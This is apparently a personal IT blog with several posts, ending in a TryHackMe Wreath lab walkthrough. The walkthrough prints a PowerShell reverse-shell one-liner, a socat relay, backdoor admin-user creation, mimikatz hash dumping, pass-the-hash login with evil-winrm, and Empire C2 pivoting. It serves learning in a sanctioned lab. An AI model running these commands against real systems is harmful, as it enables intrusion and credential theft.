Author: talanwestby

Categories
Linux

APT Update Issue

It’s been a while since Matt or I have posted as we start some new journeys in our lives.

I’ve now started a new role and as part of that, I’ve become an advisor for a Cyber Community at work. This has led to me building our CTF platform available at cyberranges.co.uk where you can host your own competitions independent of another competition taking place. This platform makes use of Docker to be able to host images of challenges that participants can spin up on demand.

This tale came about this weekend when I was stumped trying to create a new challenge that my brother-in-law created for us. This challenge made use of apt-get update using Debian in the Dockerfile, the issue was every time I tried building the image the build failed after about 10 minutes. When investigating the build was showing the following:

Ign:1 http://archive.ubuntu.com/ubuntu nobel InRelease

I ran some additional tests to see what might be going on in particular using WGET I could see that I was getting a TCP connection but no HTTP response:

wget --spider http://archive.ubuntu.com/ubuntu
Spider mode enabled. Check if remote file exists.
--2024-07-29 10:39:37--  http://archive.ubuntu.com/ubuntu
Resolving archive.ubuntu.com (archive.ubuntu.com)... 185.125.190.83, 185.125.190.81, 91.189.91.83, ...
Connecting to archive.ubuntu.com (archive.ubuntu.com)|185.125.190.83|:80... connected.
HTTP request sent, awaiting response...

The worst bit about this was the final response I got from apt update:

Connection failed [IP: 91.189.91.81 80]

I tried many different things from DNS to internal IP Addressing changes to see if something weird was going on in the internal network. I tried a different mirror which worked perfectly so it was something specific to archive.ubuntu.com. I also tried building a new Ubuntu server which had the same problem. If I wanted to use a different mirror the issue is in your Dockerfile you need to replace your sources file before you try apt update and I didn’t want to have to force anyone creating a challenge to do that.

Ultimately, I decided to request a new IP Address from my service provider which did the trick. I have no idea why I didn’t get a 4XX response from the server but there you go. If ever faced with this issue try getting a new IP Address first before going down the rabbit hole I did.

What broke me was the fact that I have four Ubuntu servers and a Debian server sat behind this IP Address where two of the Ubuntu servers were fine and two were not. Very odd. Anyway, lesson learned.

Categories
Uncategorized

Huntress CTF 2023

I decided this year during cyber awareness month I was going to finally participate in a Capture the Flag (CTF) competition. After looking around at some of the offerings and following John Hammond on YouTube (https://www.youtube.com/@_JohnHammond) I gravitated towards the Huntress CTF.

Their competition has been spread over all of October, releasing a couple of challenges a day, up until the last week when the challenges began to get tougher. Here are some of the takeaways and highlights from the entire challenge this year.

  1. A lot of the challenges are really quite easy and when they have put “easy” down they really have meant it. What these challenges have done however is made me realise exactly where the gaps are. Whilst they have been challenging they have also been rewarding. Challenges like BaseFFFF+1 really threw me for a loop as I’d never seen the encoding method used before.
  2. The community are absolutely awesome, I’ve been able to collaborate with a few people over the last month and have gotten to know these individuals and find out where they are in their learning journey. Don’t get me wrong some of them are sticklers for making sure you spend a reasonable amount of time on a challenge/down a rabbit hole before they will help, it is a competition after all. However, they absolutely do help out and learning from these individuals has been truly amazing. I hope I’ve been able to impart some knowledge to them as much as they have helped me.
  3. The duration. This for me was a marathon, not a sprint and finding time to tackle the challenges whilst moving house and dealing with a day job has been especially hard. I’ve found getting the laptop out and cracking on with the challenges just as hard as some of the most basic challenges. If you want to spend a day messing about finding flags this one is absolutely not for you. However, if you want to learn over a period of weeks, and collaborate either in a team or just with a bunch of different people then this one really does work.
  4. Highlight challenges.
    • There are quite a few here but the ones I was particularly good at were the OSINT ones (didn’t think I would be but only took me a couple of minutes). These challenges made use of the Geoguesser game:
      • Under the Bridge
      • Operation Not found
    • I also found some of the forensic and miscellaneous challenges quite rewarding, in particular:
      • Tragedy Redux
      • Operation Eradication
      • Rock, Paper, Psychic
      • Bable
  5. Time. All in per day I believe the maximum amount of time I spent was about 3 hours. It’s not a small commitment as I alluded to in a previous point particularly if you come across something you’ve never seen before.

Conclusion

So what do I personally think about this CTF. Honestly, if it wasn’t for the community that joined up I probably wouldn’t be doing it again. The time commitment for me particularly with what I’m going through personally at the moment is too much and as a result, it would have put me off playing again should they do it next year. That being said, I am hoping to participate again next year depending on work and personal life. I’m also hoping to take some of these ideas and build my own CTF for work. Would I recommend this to any other cyber security/IT persons? Absolutely, the benefits of the community far outweigh the time requirements. The only thing I would suggest is to make sure that you’re having fun with it. I at some points got quite anxious because I saw there were challenges that were incomplete. This says way more about the type of person I am than the game that the Huntress team put on and please don’t be discouraged.

Categories
Networks Servers

Hyper-V Cluster Intermittent Issues

Last week we started getting very weird issues on the Hyper-V cluster at work where some VMs would randomly lose connectivity to other VMs. To put this in context we have around 130 active VMs at any one time and connectivity would be intermittent on around 20 of them. Of these 20 there would be connectivity loss from one VM to five or six others.

These issues started to look like just a general network issue as it only affected for VMs between hosts. A job was logged with Juniper our networking provider to take a look.

Junipers investigation led to the cabling we’d installed about a month ago. These cables are direct attached copper from fs.com with the Juniper specification programmed onto them. Juniper had decided that the type which was passive wasn’t supported by the EX4650s that we are using for the core switches. We needed the active ones. I couldn’t believe that Juniper didn’t support their “own” cabling in their Mist flagship switching. We replaced the cables and the intermittent issue got progressively worse as the day went on.

With my work being a college our busiest time of the year is right around the corner, Enrolment. The director wanted a fix and wanted it now.

I started re-investigating the logs on the Hyper-V hosts and noticed this log: about 10 times a second on two of our four hosts:

The MAC address 00-15-5D-AE-25-18 has moved from port 53A6AB28-EBD3-4F72-B690-69406077B8A7 (Friendly Name:.) to port 9A8780F9-D931-4F85-B087-397A2F718C01 (Friendly Name:.).

This made no sense as the LBFO Team has the Hyper-VPort load balancing algorithm configured on it so VMs shouldn’t change ports. I ran the following command to get the MAC addresses of the VMs:

Get-VM | Get-VMNetworkAdapter | Ft Name, MacAddresses

Once I found the VM I moved it across to another host. Monitoring the logs on the original host I noticed they were still being generated like five minutes later.

Now we were getting somewhere so we’d moved the VM with the MAC address associated to it but the MAC address was still there. My spidey sense started tingling and I began to think duplicate MAC addresses. Running the Get-VM command above again and there we go another VM with the same MAC address. Changing it reduced the problems but didn’t resolve them time to go hunting.

I found another couple of VMs with the same MAC address as each other but different to the original I was looking at. Changing one of those completely solved the problem.

So what happened? We have Microsoft’s Virtual Machine Manager to set up and manage all of the networking for the cluster. This management also makes use of MAC address pools to allocate to VMs. The VMM server has been broken for a couple of days and I think Hyper-V just decided to start changing MAC addresses when we were moving VMs about trying to fix the problem.

I hope this helps someone else who runs into this issue as researching that event. Hyper-V-VmSwitch event ID 25 literally yields no results in relation to intermittent connectivity failure.

Update

After some time we started to notice that other VMs were getting duplicate MAC Addresses again which is rather annoying. Investigating the issue we found that the duplicate MAC Addresses that were being assigned all started with 00:15:5D. As we believed the MAC Address pool was allocated through VMM we started investigating the pool to see what was going on.

On review, we found that VMM had a MAC Pool starting with 00:1D:D8 which clearly wasn’t the same as the MAC Addresses being allocated to the VMs which were being identified as duplicates. Looking into Hyper-V for each cluster node we found that each node had a MAC pool that matched 00:15:5D. Now we had a place to look. Every Hyper-V host in the cluster had the exact same pool 00:15:5D:1E:1B:00-FF. So looking at it further we now know that the MAC addresses were being allocated through Hyper-V instead of VMM. The question was why?

Simply put it was our backup system Arcserve. As this system is not properly cluster aware what it does to restore a VM is connect to the cluster name and pull back a host within the cluster, then connect to a Hyper-V host and perform a restore to that host. This in turn stops management of the VM from VMM meaning that Hyper-V was managing the MAC address allocation. We confirmed this by loading Failover Cluster Manager and checking a couple of VMs one which had SCVMM in its name and one which didn’t. Sure enough, the SCVMM VM had a MAC address starting with 00:1D:D8 and the one that didn’t had an address starting with 00:15:5D.

To understand why here is a link to another blog explaining how MAC Addresses are handled in VMM and Hyper-V environments: https://www.darrylvanderpeijl.com/hyper-v-vmm-mac-addresses/

Once we identified that we ended up modifying each host to have slightly different pools meaning any VM that got restored in the future shouldn’t get a duplicate address from Hyper-V as each host can use its internal algorithm to check for duplicate MAC Addresses.

Categories
Coding Computers Hacking Networks Servers

Random Learnings

As you may know, I’ve been working on my penetration testing skills over the past couple of years taking some courses here and there to help me along the way. All of these courses have been super cheap within $5-60 which has been incredible but as per usual I have purchased way too many courses as my curiosity for the better of me.

The courses I have purchased are as follows and here’s what I think of them:

EC-Council – CodeRed

  • Wireshark for Ethical Hackers – If you’ve got any IT proficiency don’t bother with this, you’ll get frustrated at watching the videos and seeing the trainer stumble through the course. It almost feels like he’s learning it himself in some places.
  • The Complete Python Hacking Course: Beginner to Advanced – Is pretty good and great if you can get it for $5 like I did. Teaches you all about Python which is a great learning experience.
  • Black Hat Python: For Pentesters – Not a bad course but save your money and buy the one above this.
  • Zero-Trust – Great if you need a high-level overview of what the zero-trust model is. Worth the $5 if you can get it at that price.
  • Reverse Engineering (Part 1 & 2) – Don’t really remember much on these two but they have good reviews on the platform so if you want to get into reverse engineering these may be good for you.
  • Reverse Engineering and Memory Hacking with Cheat Engine – Really don’t bother with this. It’s got good reviews on the site but I really struggled with why this course existed. The instructor just went through the Cheat Engine tutorial which you can go through yourself.
  • Practical Cyber Threat Intelligence – This course is really good if you’re a manager trying to understand the lifecycle of Cyber Threats. There is some technical stuff in there but it’s really high level.
  • Learn to Create AI Assistant (JARVIS) with Python – This course is OK. Once you get past chapter 3 which is setting up the Text to Speech functionality the rest of the course is just setting up the individual methods/functions for what you want “JARVIS” to do. There are much better courses available on the internet for this that use ChatGPT making the system way more flexible as such I wouldn’t bother with this one.

TCM Security

  • Practical Ethical Hacking – This course is amazing loads of really good stuff in there relating to ethical hacking and what you would likely be doing should you be in the penetration testing field for a day job. Well worth the $35.
  • Open-Source Intelligence – Another great course by TCM looking at parts of penetration testing that typically go overlooked. Some great exercises show how much information is readily available on the internet.
  • Practical Malware Analysis & Triage – This was one of my favourite courses to date, something a bit different for me, the only downside was it took me nearly six months to get through it. Part my laziness, part work getting the way. Would highly recommend this one.
  • External Pentest Playbook – I brought this in the heat of the moment trying to pass my PNPT thinking I had missed something. The course isn’t bad but I feel you get just as much information from the Practical Ethical Hacking course just from a different angle.

Zero Point Security

  • C2 Development in C# – This course is awesome if you’re into programming. I’ve thoroughly enjoyed going through this course and picking up all sorts of techniques that I’m implementing in C# for the day job. I’ve enjoyed the course so much that I’ve continued developing my C2 network in C# and am even considering paying for the Red Team Ops course as I enjoyed learning from this instructor.

Udemy

  • Offensive C# – This course, where do I start, the instructor sounds like he’s at the end of a long tunnel when recording as such it’s quite difficult to understand what he’s saying at times. The course itself isn’t bad and there are a few pieces of code that I’ve taken and added into my C2 development. I would say unless you can get this for cheap or free I wouldn’t bother as one of the first things he does is creates a C2 service in Python….

Hack the Box

  • Certified Penetration Testing Specialist – This course I’ve only just started and whilst it’s enjoyable so far the material is aimed at beginners who have only just started on Penetration Testing. All the courses and books I’ve read over the past couple of years are a bit of a detriment here and with me wanting to take the CPTS exam at some point you are required to go through the entire course which isn’t good for anyone who’s got some experience.

As you can I’ve gone through quite a few courses over the past year. I would say all in all I’ve spent about £250 for all of this which in terms of investment I would say is pretty good.

Categories
Uncategorized

TCM Security – PNPT Exam

So I took this exam last week and it’s fair to say I failed and pretty hard too. The structure of the exam is really good and I felt that the initial contact was very well written. The Rules of Engagement are super clear and you’re given an Open VPN file to connect to the network.

The network itself is really responsive and running scripts and other attacks work really really well.

The problems

Please note the problems here are all mine. Absolutely nothing wrong with TCM and their practices.

After about 9 hours of trying to get some sort of foothold on the network and getting nowhere, I became super frustrated so frustrated I emailed TCM’s support team asking them to check the environment as I was convinced something was wrong. Let’s put it this way I didn’t send my email graciously, it was a rather panicked clumsy email that no doubt sounded like I was asking for help and tips. I wasn’t but certainly didn’t help myself. They responded in about 10 minutes which I couldn’t quite believe. They were very gracious in their response and kindly informed me that the environment was working fine with no errors.

The second thing I did which was super stupid in hindsight is going to Discord Server and ask for general guidance on OSINT. I was convinced and still am that my OSINT sucked. What I was trying to ask for is how people take the information and make the decision on their attacking method. I was quickly pulled into a one-to-one meeting with the moderators and told off. Whilst this is an open-book exam and I felt I was being generic enough to ask, the topic in question is still pertinent to the exam. Just learn from my mistake don’t do it. Fortunately, the moderator was gracious enough to tell me off and put a temporary ban on my account on the Discord Server. They said that if I did anything like that again, my exam would have been terminated. It’s not worth it, it’s open book just go to Google and research.

Take-Aways

So all in all, I didn’t get very far in the exam, the thing I wanted to test my knowledge on Active Directory I never got into which is a shame. Once I submitted my report the TCM team dropped me a little hint, my jaw dropped as I looked into it and my wife started laughing her head off because it was rather stupid.

Takeaway 1: I believe the exam is designed for beginner to intermediate, if you’re spending hours and hours coming up with weird and wonderful ways to exploit something, don’t. Just stop!

Takeaway 2: In the courses, Heath talks about the importance of Enumeration. I genuinely believe he’s right here. Make sure you’re notes are right on this and make sure you include Reconniasinace and Scanning within your Enumeration.

Takeaway 3: There’s a saying “try harder” when it comes to this stuff. However, John Hammond, I think re-phrases this perfectly to “try again”. If you’re stuck. Stop, you might not be able to let go of what you’re doing in your head. I know I can’t however, take 10-20 minutes off, step away from the desk and get a cup of tea or coffee. Then when you sit back down at your desk and review all of your Enumeration, it’s likely there’s something in there that you can use which is much easier than whatever you’re looking at.

Next Steps

I’d like to give this another crack, however, all of my Cisco certifications are up for renewal at the end of the year and with work moving to Juniper, I don’t have access to any of their hardware so I need to put some time aside to get back to it. If I get time I’d like to have another go before the end of the year but we’ll see what happens with my other certifications. I’ll update here once I’ve had another go.

Attempt 2

So, it happened again. TCM has announced a complete overhaul to their exam scenario and should I want to make use of the hint I was provided with I should have another go before the end of 2022. Not ideal with my Cisco certification renewals looming but I felt I needed to use the knowledge I gained on the scenario and not waste it.

With the hint I got from the last attempt I spent 30 minutes on the re-attempt and had access to the internal network through Proxychains. I attempted to use Responder, MITM6 and NTLMRelayX but as they all use Link-Local networking I needed to run the software on the External server. Unfortunately, I couldn’t escalate my privileges on that external server and as such I could run those pieces of software as it needs root privileges.

I was able to run some brute-force attacks against the internal network and got a user account on the domain but the account didn’t have any privileges so I could use SMB or RDP to get onto the internal network any further. All in all a bit of a shame but I’m glad I didn’t give up and continued to attempt to gain further access.

Categories
Computers Hacking

Practical Ethical Hacking – TCM Security

TCM recently had a discount code available to get their Practical Ethical Hacking (PEH) course for $1. In the UK this worked out with taxes to be about £1.10 which in my mind is an absolute bargain. Bearing in mind that I have over 10 years of experience in IT Infrastructure and about a year fumbling through Ethical Hacking courses. I thought I’d give my thoughts on the course so far as I’ve just completed the Capstone section.

The initial sections of the course, Network Refresher, Setting Up Our Lab, Introduction to Linx and Introduction to Python are very basic, I get the feeling that this part of the course is designed for anyone who doesn’t have any experience in Networking, Linux or Python. I supposed based on the fact that most of them say “Introduction” that’s about right. They are good in their content but if you’ve already got experience in these technologies you can pretty much skip the entire section. I found a few bits useful reminders like Tuples in Python being immutable.

The next section was the first part of the hacking lifecycle, Reconnaissance. This was quite a good section as it introduced tools available on the internet that you do not get introduced to by using services such as TryHackMe. Whilst TryHackMe does have some OSINT rooms I never really walked away from completing those rooms feeling like I learned something where I did with this as Heath takes you through what you’re looking for a why.

Scanning & Enumeration is the next section which again if you’ve not done any sort of Hacking/Pen Testing/Red Teaming is a great introduction to some of the basics. I really like the emphasis that Heath puts on this section and Reconnaissance as with him I believe it’s the most important as having as much information as possible, makes the rest so much easier. I would say that the Nessus scanning is included in this section as well but TCM/Heath has given it, its own section and rightly so. Nessus is a monster and a wonderful tool but it is part of enumeration.

The final section before the Capstone is the exploitation, again not too much here I hadn’t seen before but understanding the difference between staged and non-staged payloads was great as it also explained why sometimes when using things like Metasploit the exploits don’t work with one type of payload but work with another. You are also taken through the manual exploitation process which at first glance feels like it’s going to be coding your own exploit against a piece of software. Actually, it’s just googling until you find an exploit someone else has written understanding the exploit and how to run it against your intended victim.

Capstone

So the Capstone section, in this section you’re given five machines to attempt to hack. The idea is you have a go and in the event you get stuck they provide a video to go through and work out where you went wrong and why. The five machines in order are Blue, Academy, Dev, Butler and Blackpearl. These machines are supposed to go from basic to harder. I personally found the first two a breeze, Dev I ended up not following my methodology on and went down a rabbit hole on one of the open ports. In other words, explore all ports. Butler was annoying, there’s no other word for it. I spent hours on this machine trying to break past the authentication to no avail. I finally gave up after 10 hours and watched the video and in the end, it turned out that whatever I put at it (in this case the rock you database) wouldn’t have gotten me anywhere. All I will say is to pay attention to the software name, apparently, some administrators like to use something like this for the username and password to a piece of software. I thought this was a bit cheeky as I’ve never seen anything like that before in the industry. Blackpearl was a great learning experience and I cracked that in 90 minutes after watching all of the videos I believe I got most of the things nailed, don’t forget this isn’t a CTF, you need to capture all possible paths of exploitation and privilege escalation in your notes for your report later.

My thoughts

So my thoughts on this course, it’s a great introduction to ethical hacking and so far it’s been quite enjoyable to understand some different techniques that people are using. I personally haven’t picked up loads with having quite a lot of experience however, the things I have picked up I believe have made me understand things better and that can only be a win. I still have Exploit Development (Buffer Overflow), All of the Active Directory (AD) sections as well as Web Applications and Post Exploitation to do and I’m really looking forward to it as I’ve not done much around attacking AD. I’ll update this post once I have completed the rest and let you know my thoughts on the second half of the course.

Categories
Networks

AudioCodes VE, Teams and Gamma

The Background

The company I work for has been users of Sonus/Ribbon SBC’s for just shy of 10 years and in that time the devices have become an absolute pain in the backside to support. We have been seeing one minor routing change or an Access Control Entry re-number in our firewalls that completely stops communication between the Ribbon SBC and Teams.

We decided the time was up on these SBCs and the plan was to move to a hosted solution, unfortunately, we found out one of the directors had signed a multi-year agreement with Gamma on our SIP service. In the end, we purchased an AudioCodes SBC, specifically a virtual one.

I hope the below may help you in configuring your AudioCodes device with Teams and prevent you from coming into the same issues we faced.

The Problems

The first problem we came across when we installed the SBC and followed the AudioCodes guide for Teams Direct Routing was the re-writing of specific headers or lack thereof. We noticed that the SIP TO header wasn’t being modified as it was being sent out to Gamma. We submitted a support ticket and all AudioCodes were saying is we needed to remove the Message Manipulation that we were trying to implement on the outbound leg to Gamma. After back and forth with them, we ended up just pursuing the issue with Gamma as turning off Message Manipulation wasn’t the answer. What was being sent to Gamma in the SIP TO header was: +441234567890@siptrunk.example.com. siptrunk.example.com being our FQDN of our TLS connection to Teams which had nothing to do with the outbound leg to Gamma who were expecting their gateways IP Address. After a load of back and forth with Gamma’s excellent support team, we identified five manipulations that needed to take place for both connectivity and also Caller ID:

FORMAT Index = ManipulationName, ManSetID, MessageType, Condition, ActionSubject, ActionType, ActionValue, RowRole;
MessageManipulations 0 = "To URL Host", 0, "", "", "Header.To.URL.Host", 2, "Param.Message.Address.Dst.IP", 0;
MessageManipulations 1 = "Contact Header Name", 0, "", "", "Header.Contact.Name", 2, "'01332333000'", 0;
MessageManipulations 3 = "P-Asserted-Identity", 0, "", "", "Header.P-Asserted-Identity", 2, "'<tel:01332333000>'", 0;
MessageManipulations 4 = "From Header URL User", 0, "", "", "Header.From.URL.User", 2, "'01332333000'", 0;
MessageManipulations 6 = "Request URI to Destination", 0, "", "", "Header.Request-URI.URL.Host", 2, "Param.Message.Address.Dst.IP", 0;

So the first and last manipulation was needed so we could send the correct information to Gamma which was the Request-URI.URL.Host and TO.URL.Host had their SIP gateways IP Address in it rather than siptrunks.example.com. The other three were needed so that when we dialled out a customer would see the call coming from 01332333000.

Now that we got connectivity and are able to make and receive calls we migrated across to the new platform. That’s where the second problem occurred. What we identified was we were able to transfer blindly between a PSTN call and two users within Teams but were unable to perform a consultative transfer. We spent just over four hours checking and rechecking the REFER header configuration which is required in transferring within Teams however, we got nowhere.

In the end, we found a thread on the Microsoft forum relating to an issue with the lack of Music on Hold for consultative transfers, following this thread we re-read the AudioCodes integration document: https://www.audiocodes.com/media/13253/connecting-audiocodes-sbc-to-microsoft-teams-direct-routing-enterprise-model-configuration-note.pdf and noticed that it was an optional extra to configure this. We bit the bullet and set this up downloading a WAV sample file and using the DConvert utility available from AudioCodes to convert it to a .DAT file. We then set the IP Profile to use the internal audio file and hey presto Consultative Transfers started working.

I guess the issue here was with there being no audio being sent from Teams the AudioCodes SBC decided that the call was dead and decided to terminate the call.

What’s weird about this solution is we found that the original Teams music on hold was being played to the caller, not the one we uploaded (We purposely chose something completely different). However, it worked.

Categories
Uncategorized

Fortigate MFA – Administration

At work, we have been customers of Fortinet for just under 10 years. During this time we haven’t really had anything wrong to say about their product, the Fortigate. That was until about a year ago when we pursued our Cyber Essentials Plus certification. Before we dived into the audit we went over the scope and believed the edge firewalls to be within the scope of audit purposes. This meant that we were going to need to show one of two things for our administration access. Multi-Factor Authentication or Lockout policies. As we were big users of Azure MFA we decided to go down this route as an easy win.

Upon investigation into setting this up, Fortinet had their own product the FortiToken to be able to take advantage of MFA for administration purposes. However, they did allow AzureMFA through SSL-VPNs so we decided to see if we could adopt their configuration guide to allow us to perform MFA on the logins for administration purposes. After a load of trail and error we managed to get it working.

RADIUS Server Configuration – Fortigate

config user radius
edit "NPS"
set server "10.0.0.100"
set secret ENC SecretKey
set timeout 60
set all-usergroup enable
set password-renewal disable
next
end

User Group Configuration – Fortigate

config user group
edit "Admins"
set member "NPS"
next
end

User Configuration – Fortigate

config system admin
edit "twestby"
set remote-auth enable
set accprofile "super_admin"
set vdom "root"
set email-to "talan.westby@takeitfurther.co.uk"
set remote-group "Admins"
set password ENC SecretBackupKey
next
end

Network Policy Server

On your Network Policy Server (NPS) install the AzureMFA extension as per the Microsoft documentation: https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-nps-extension

Next, configure NPS to allow connection from your firewall by setting up a RADIUS Client. All this needs is the IP Address and the SecretKey configured in the Fotigate RADIUS Server Configuration above.

Next, we’ve had to set up both a Connection Request Policy and a Network Policy. In the Connection Request Policy, we’ve left everything at default apart from adding one condition which is the RADIUS Client IP so it always hits this policy and add a Vendor-Specific Attribute in the settings. This Attribute is a RADIUS Standard attribute and has a string value of 12356 and we’ve set the policy to conform.

Finally, we set the Network Policy to meet two conditions, the RADIUS Client IP and the group of users we wish to use for this administration. In our case, we used our IT Department. The constraints we use are to enable PEAP in the EAP types and MS-CHAP-v2 as an authentication method. We’ve then set the same Vendor-Specific attribute as in the Connection Request Policy.

Notes

One thing to note here is we attempted to configure this whilst keeping our old NPS setup active. Don’t do this. We weren’t getting the expected results and were seeing our RADIUS traffic hitting both our old and new NPS servers and as the old one didn’t need MFA it was responding with the Access-Accept message before the MFA was performed. This took me quite a while to figure out despite me setting our group to go via the new MFA NPS server in the Fortigate. The simple solution is to either remove the RADIUS Server from the configuration or just move the configuration across to the new NPS Server altogether.

Categories
Coding Computers Hacking Linux Networks Servers

TryHackMe – Wreath Network

So over the past couple of weeks, I decided to go through the TryHackMe room: Wreath. This room is designed to better understand an entire Pen Testing engagement with a potential customer.

This room is really good at going through some very key points that I haven’t found anywhere else (yet) on the TryHackMe website. The room specifically looks at, Pivoting, Anti Virus Evasion and Comand and Control system. All three of these are brilliant topics to get your head into and TryHackMe does a great job of providing enough information without overloading you.

The first point of the room is to give you a brief of the engagement which has the following key points:

https://tryhackme.com/room/wreath

There are three machines on the network
There is at least one public-facing webserver
There is a self-hosted git server somewhere on the network
The git server is internal, so Thomas may have pushed sensitive information into it
There is a PC running on the network that has an antivirus installed, meaning we can hazard a guess that this is likely to be Windows
By the sounds of it, this is likely to be the server variant of Windows, which might work in our favour
The (assumed) Windows PC cannot be accessed directly from the webserver

The Web Server

So the first thing to do is begin with some enumeration of the network. The subnet changes each time the network is reset, so you may need to be careful if you take more than a day or two on the entire room. Enumerating the network using Nmap to identify what devices are available. The lowercase x below is because you should configure this to be whatever TryHackMe tells you at the moment it is .90.X:

nmap -Pn 10.200.x.X/24

Once initial scanning is done and you’ve identified the webserver (it should be the only server available) then you can perform a more in-depth Nmap scan:

nmap -sS -sC -sV -O -A 10.200.X.X

This will return a few services available on the web server. One of these services has a critical CVE from 2019. A quick search using searchspolit on Kali of ExploitDB online will provide you with the exploit’s Proof Of Concept (POC). Use this python exploit to gain access to the system. It is advisable to read the code to better understand what the exploit is and how it can be leveraged. This exploit is particularly bad as the service runs as Administrator/Root so once we’ve used the exploit we will get a shell as root.

OK, so now we effectively own that machine we need to stabilise our access. The best way to do this is to see if we can find SSH keys for our root user which we can then use to remote in moving forward.

GitServer

So now that we have access to the web server we need to get access to the next server in the network. To do this you want to follow the five steps outlined in the room:

https://tryhackme.com/room/wreath

Using material found on the machine. The hosts file or ARP cache, for example
Using pre-installed tools
Using statically compiled tools
Using scripting techniques
Using local tools through a proxy

It is worth reading all the room has to offer on different tools for Pivoting, there are some amazing tools available. I personally really like socat but have used ProxyChains before too.

As per the recommendation, we can use statically compiled tools to run on the Web Server to gather additional information about our next target. To do this you can download a static variant of Nmap from here:

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true

The upload it to the webserver you compromised. There are a variety of ways you can do this, either using cURL or SCP as we have SSH access. Once uploaded we can use our copy of Nmap to scan the network again and find whatever IP address is available. As we may be able to identify some devices which are Windows we should assume all devices are up without allowing ICMP/Ping. Windows blocks this by default:

./nmap -sn 10.200.X.X-X -oN scan-Username

There are two devices that we can now see on the network, one which has some open ports and another which is filtered, so we know the other exists but we’re blocked from accessing it. Based on the brief we must assume that the filtered device is the Personal Computer with the Anti-Virus installed on it. Let’s park that one for now and concentrate on the Git Server. We’ve found a few ports open and an application which has a vulnerability.

Now to get access to the system we need to pivot through the web server we’ve already compromised. I personally tried to get this to work with Socat but struggled mainly because I wasn’t experienced with Firewall changes in CentOS. Follow the guides of TryHackMe and use the shuttle it’s really easy to use and takes one line to get a pivoted connection:

sshuttle -r root@10.200.90.200 --ssh-cmd "ssh -i id_rsa" 10.200.90.0/24

Now we can start investigating the open ports we found. There’s a particular web application available on this server that again has a particularly bad vulnerability. We can run this python2 script to create a backdoor on the GitStack server which we can then use to run commands on the server to gather further information.

Socat Listener/CentOS Firewall

We now need to set up a Socat listener between the Web Server and our Kali attacking machine to allow the connection from the GitServer back through to our Kali machine for a reverse shell. The first thing here is the create a Firewall rule to allow the Socat connections through:

firewall-cmd --zone=public --add-port 16000/tcp

Now that we have a port open we can upload Socat to the Web Server, again using cURL or SCP and create the connection back to the Kali server:

./socat tcp-l:16000 tcp:10.50.91.232:443 &

Now if we open a netcat listener on our Kali machine on port 443 we can run the Powershell script in the next section to get a shell.

Powershell/Reverse Shell

The main thing is here we can use the backdoor to create a reverse shell using Powershell and encoding the command for URL https://www.urlencoder.org/:

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

This should give us a pseudo shell once we replaced the ‘IP’ and PORT part of the command above with the IP of the Web Server and the port you opened up.

Stabalisation & Post Exploitation

Now that we have a connection onto the GitServer we need to ensure that we can get connected again should we lose connectivity through this PowerShell reverse shell. To do this, because we are SYSTEM we have full administrator rights. Let’s create a new user and grant them full admin rights:

net user <username> <password> /add
net localgroup Administrators <username> /add
net localgroup "Remote Management Users" <username> /add

This now gives us a user that we can use to log into the machine as a local admin. The ports that we found when performing our Enumeration work gives us some options available to us. One is RDP and the other is WinRM.

The room takes you through installing freerdp2-x11 which is a really useful utility as you can add shares from your local machine (Kali) so gaining access to tools such as mimikatz becomes as simple as one command:

xfreerdp /v:10.200.90.150 /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

In this command, we’re logging into the server and creating a SMB share called “share” which routes back to /usr/share/windows-resources. We can then load any of our exploits/resources in that folder directly into memory through the share.

We can now run mimikatz to capture hash files of all of the users now we’re logged in as an administrator. Load mimikatz and run the following commands:

privilege::debug
token::elevate
lsadump::sam

We can now store the NTLM hashes to try and crack them and if we cannot we can still use them later on. To create an alternative form of access we have WinRM at our disposal and now we have the NTLM hashes we can use them. Install evil-winrm:

apt get install evil-winrm

Now we can remote into the server using evil-winrm with our administrator hash:

evil-winrm -u Administrator -H <AdministratorHash> -i 10.200.90.150

Command and Control

Now this section is awesome not only because the introduced software is very well written and works amazingly, but whoever wrote it decided to name it Empire and the GUI Starkiller. For anyone who loves Star Wars like me, this is amazing.

The way this system works is there is a command server, usually your Kali machine or if you’re doing this for a career a Linux machine somewhere in the cloud. This command server has a listener or number of listeners on it, waiting for connections from your agents. These listeners come in various options but the most used ones are HTTP and HTTP-Hop mainly because they can blend into normal day-to-day traffic easier.

The next part is the stager, this is a script/command that creates our agent. This comes in a number of forms but Bash and Powershell are the ones introduced in the Wreath room. Once these stagers are run on your compromised machine they will create an agent connection back to your control server. Once connected you will be able to run commands as if you were on the agent through the command server.

I mentioned in the part about listeners about HTTP-Hop, this is a special listener because it allows you to set up a hop station should you be pivoting around a network. What this essentially does is allows us to take an entry point in the network and make use of it as a “jump” server between our command server and a compromised device that doesn’t have internet connectivity for example:

Command Server <—–> Web Server <—-> Compromised Machine

Take the points above, the compromised machine doesn’t have connectivity to the internet however, it does have connectivity to the web server and the web server has connectivity to the internet. In this case, we have a listener set up to communicate from the Web Server back to our Command Server, what we can do is create an HTTP-Hop listener and install it on the Web Server which will redirect the traffic from the Hop to the original listener installed. Then on the compromised machine, we tell the stager to connect to the Hop listener and hey presto connectivity from the command server through the web server to the compromised machine.

Personal Computer

OK, so we now have full control over both the Web Server and GitServer as well as a couple of ways to access both. From here the next step was to start enumerating the final device in the network. We know from previous enumeration attempts we were being filtered on the Web Server when we tried to connect to this computer .100 but now we have access to the GitServer we can try and run a port scan.

To do this we can upload a Powershell script through Evil-WinRM:

evil-winrm -u Administrator -H <hash> -i 10.200.90.150 -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/

Now using PowerShell we can initialise the script we want called Invoke-Portscan.ps1 from the network folder we added in the previous command:

Invoke-Portscan.ps1

Finally, to enumerate the Personal Computer we can run that script:

Invoke-Portscan -Hosts 172.16.0.10 -TopPorts 50

Further Pivoting

